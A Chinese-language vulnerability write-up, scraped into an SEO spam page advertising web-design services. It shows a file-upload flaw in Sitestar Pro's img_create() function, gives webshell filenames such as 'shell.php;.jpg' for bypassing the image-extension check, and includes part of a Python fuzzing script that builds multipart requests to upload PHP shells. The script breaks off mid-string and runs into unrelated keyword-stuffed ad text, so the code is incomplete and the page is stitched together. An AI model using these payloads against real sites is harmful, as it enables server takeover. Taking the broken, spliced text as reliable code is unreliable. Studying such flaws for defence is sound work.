网约车app开发_快速建站公司_深圳网站优化_闵行网页设计

0x00 Sitestar

美橙互联又一力作,建站之星专业版(Sitestar Pro),

无拘无束,信手拈来,创意无限,不拘一格,轻松创建属于您自己的网站!

0x01 漏洞的产生

/module/mod_tool.php 第89行起,img_create()函数

[php]

public function img_create() {

$file_info =& ParamHolder::get('img_name', array(), PS_FILES);

if ($file_info['error'] > 0) {

Notice::set('mod_marquee/msg', __('Invalid post file data!'));

Content::redirect(Html::uriquery('mod_tool', 'upload_img'));

}

//exit($file_info["name"]);

if(!preg_match('/\.('.PIC_ALLOW_EXT.')$/i', $file_info["name"])) {

//echo '2222';

Notice::set('mod_marquee/msg', __('File type error!'));

Content::redirect(Html::uriquery('mod_marquee', 'upload_img'));

}

if(file_exists(ROOT.'/upload/image/'.$file_info["name"])) {

$file_info["name"] = Toolkit::randomStr(8).strrchr($file_info["name"],".");

}

if (!$this->_savelinkimg($file_info)) {

Notice::set('mod_marquee/msg', __('Link image upload failed!'));

Content::redirect(Html::uriquery('mod_marquee', 'upload_img'));

}[/php]

上述关键的代码

[php]

if(!preg_match('/\.('.PIC_ALLOW_EXT.')$/i', $file_info["name"])) {

Notice::set('mod_marquee/msg', __('File type error!'));

Content::redirect(Html::uriquery('mod_marquee', 'upload_img'));

}[/php]

其中 PIC_ALLOW_EXT 为 gif|jpg|png|bmp 即如果文件名最后不是gif|jpg|png|bmp,则提示文件类型错误

我们继续往下看...

[php]

if (!$this->_savelinkimg($file_info)) {

Notice::set('mod_marquee/msg', __('Link image upload failed!'));

Content::redirect(Html::uriquery('mod_marquee', 'upload_img'));

}[/php]

跟进_savelinkimg函数 736行-741行

[php]

private function _savelinkimg($struct_file) {

$struct_file['name'] = iconv("UTF-8", "gb2312", $struct_file['name']);

echo $struct_file['name'];

move_uploaded_file($struct_file['tmp_name'], ROOT.'/upload/image/'.$struct_file['name']);

return ParamParser::fire_virus(ROOT.'/upload/image/'.$struct_file['name']);

}

[/php]

其中我们关心的是move_uploaded_file函数

[php]

move_uploaded_file($struct_file['tmp_name'], ROOT.'/upload/image/'.$struct_file['name']);

[/php]

看见没有,直接用我们上传的的文件名作为最终写进硬盘的文件名

到这里,我们可以简单对其进行利用

上传类似如下文件:shell.php;.jpg 或shell.php.a;.jpg 利用解析漏洞即可利用,但这并不是我们今天所要讲的内容,SO 继续....

0x02 尝试漏洞利用

既然文件名是我们上传的文件名,那我们用截断上传试试呢...

首先我们尝试最最最常用的截断方法: %00

为方便调试,我们加入调试代码

[php]

if(!preg_match('/\.('.PIC_ALLOW_EXT.')$/i', $file_info["name"])) {

exit("Error,不能截断.");//调试代码

Notice::set('mod_marquee/msg', __('File type error!'));

Content::redirect(Html::uriquery('mod_marquee', 'upload_img'));

}[/php]

同时将如下代码保持为sitestar.htm

[php]

[/php]

打开sitestar.htm,Burpsuite抓包 采用%00截断:

输出了我们的调试代码

看见了吧,不能成功的被截断,那我们是不是就到此为止了呢? 显然 答案是NO!

额 !!想起来了...我们都知道Fuzzing很强大... SO 继续吧...

0x03 Fuzzing成功利用

丢一真理:实践出真知,各位看官们 眼睛睁大了...

为了能Fuzzing,看来还得码代码啊,首先抓个上传的包,方便代码中用

这里我们用py写Fuzzing的代码,好吧 我已经给各位写好啦

[php]

#D:\Python27\python.exe

#coding = utf-8

import os

import re

import sys

import random

import urllib2

import urllib

def hex_to_asc(ch):

return '{:c}'.format(int(float.fromhex(ch)))

def rand5str(num):

sts = ''

char = '1234567890abcdexyz'

for i in range(num):

sts += random.choice(char)

return sts

def postdata(strr):

global sname

sname = rand5str(8)

data = '------WebKitFormBoundaryFz8xcpseXipPJz6Q\r\n'

data +='Content-Disposition: form-data; name="img_name"; filename="%s.php%s;a.gif"\r\n' % (sname,strr)

data +='Content-Type: image/gif\r\n'

data +='\r\n'

data +='GIF89a

">

长沙专业做网站

邵阳网站建设、惠州seo顾问、永久使用、不限域名、ios个人开发者账号

长沙网络建站?

  1. 首页
  2. 株洲seo
  3. 正文

网约车app开发_快速建站公司_深圳网站优化_闵行网页设计

网约车app开发 2024-09-23 02:34:32 72942
凯里网站开发大连网站优化跑腿app开发潜江网站建设深圳网站推广苏州建网站安卓应用软件开发品牌网站建设公司百度开发者大会海南做网站3g网站制作深圳网页设计公司合肥做网站石家庄做网站深圳建站公司廊坊seo武汉企业建站网站设计风格张家界seo真正免费的网站建站平台android开发环境搭建安徽建站小型企业网站建设公司武汉网站开发公司cms开发cms开发西安网页制作网站建设目标上海网站建设网站制作推广上海建站网

猜你喜欢

×
电话
留言
咨询
首页
  • 友情链接:
    • 网站前端开发 重庆网页设计 软件开发技术方案 做网站设计的公司 大连网站优化 网站模板免费下载
    Copyright © 2024 网约车app开发 版权所有  网站地图
    网约车app开发,一家专业营销型网站建设公司、响应式网站制作公司,提供企业响应式网站建设、自适应企业网站模板、营销型网站制作、响应式企业网站模板制作等服务。